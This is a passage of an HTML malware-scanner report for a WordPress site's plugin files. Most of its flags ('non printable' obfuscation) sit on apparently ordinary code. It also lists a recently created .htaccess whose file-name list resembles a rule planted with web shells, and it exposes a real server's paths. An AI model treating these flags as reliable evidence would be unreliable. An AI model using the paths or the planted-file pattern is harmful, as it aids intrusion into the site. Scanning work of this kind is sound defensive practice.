<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_274").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/shortcode_carousel_cat.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.65 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_275" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">WooComposer_Cat_Carousel</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_carousel_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 583</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 623</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_275").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/admin/.htaccess</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_276" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">comdofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">connects</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">copypaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">delpaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">doiconvs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">epinyins</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">filefuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">gdftps</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hplfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">memberfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">moddofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">onclickfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">phpzipincs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qfunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">schallfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">tempfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">userfu</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_276").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/woocomposer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.86 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_277" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"has_shortcode"</span><span style="color: #007700">)){ function </span><span style="color: #0000BB">has_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) { </span><span style="color: #0000BB">$post_to_check </span><span style="color: #007700">= </span><span style="color: #0000BB">get_post</span><span style="color: #007700">(</span><span style="color: #0000BB">get_the_ID</span><span style="color: #007700">()); </span><span style="color: #0000BB">$found </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">; if (!</span><span style="color: #0000BB">$shortcode</span><span style="color: #007700">) { return </span><span style="color: #0000BB">$found</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">stripos</span><span style="color: #007700">(</span><span style="color: #0000BB">$post_to_check</span><span style="color: #007700">-></span><span style="color: #0000BB">post_content</span><span style="color: #007700">, </span><span style="color: #DD0000">'[' </span><span style="color: #007700">. </span><span style="color: #0000BB">$shortcode</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false </span><span style="color: #007700">) { </span><span style="color: #0000BB">$found </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">; } </span><span style="color: #0000BB">retur</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_product_search</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_product_categories</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generate_shortcode_params</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 193</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 222</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$post</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_woocomposer</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 293</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_admin_notice_for_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_admin_notice_for_vc_activation</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 310</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"has_shortcode"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 318</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 320</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$found</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">our </span><span style="color: #007700">final </span><span style="color: #0000BB">results</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_query_builder</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">strip_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$value </span><span style="color: #007700">) ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_277").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/pricing/pricing-design05.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.62 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_278" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 373</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_price_generate_design05'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design05</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_278").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/pricing/pricing-design03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_279" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_price_generate_design03'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design03</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_279").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/pricing/pricing-design02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_280" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 369</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ult_price_generate_design02'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design02</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_280").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/templates/pricing/pricing-design01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.42 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_281" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
